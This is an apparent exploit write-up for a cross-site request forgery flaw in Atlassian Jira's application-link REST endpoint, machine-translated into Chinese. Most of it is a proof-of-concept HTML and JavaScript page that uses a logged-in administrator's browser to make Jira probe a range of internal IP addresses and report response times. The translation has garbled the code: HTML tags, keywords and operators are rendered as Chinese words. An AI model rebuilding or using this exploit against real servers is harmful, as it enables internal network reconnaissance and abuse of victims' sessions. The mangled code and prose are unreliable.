Atlassian Jira CSRF
媒介剧情简介
可以在以下要求执行CSRF配置应用程序链接:/ / applinks / 3.0 / applicationlinkForm / manifest.json休息
利用这个漏洞,攻击者需要说服用户与一个活跃的WebSudo会话(和权限来创建应用程序链接)点击的链接。
的概念:
以下代码生成一个请求到Jira服务器启动应用程序的创建过程链接为一个范围的IP地址(这个脚本将测试范围172.16.68.220-240在端口80上)。脚本的时间需要多长时间得到响应从每个主机,和文章在web页面的文本。
< html > <头> < meta name =“referrer”内容=“no-referrer”> < /头> <身体> < h2 > CSRF主机发现扫描仪通过应用程序链接< / h2 > < p > <按钮onclick = " startScan ()" > < /扫描按钮> < br > < textarea id =“文本区域”行= 34 50关口= > < / textarea > < >脚本函数startScan () {doFetch (“172.16.68.151”、220、240);}函数doFetch (jiraIp currentIp endIp) {var计时器= Date.now ();var = ' 172.16.68 url。' + currentIp.toString ();fetch (“http://”+ jiraIp +“: 8080 /休息/ applinks / 3.0 / applicationlinkForm / manifest.json吗?url = http://的url + + / insertMessageHere: 80 _ = 1572448964763”,{方法:“得到”,凭证:“包括”})(函数(响应){返回response.text ();})(函数(文本){计时器= Date.now()——定时器;. getelementbyid(“文本区域”)。url值+ = " \捏:“+ + +时间+“\ tResponse时间:”“女士”;如果(currentIp < endIp) doFetch (jiraIp currentIp + 1, endIp); }) }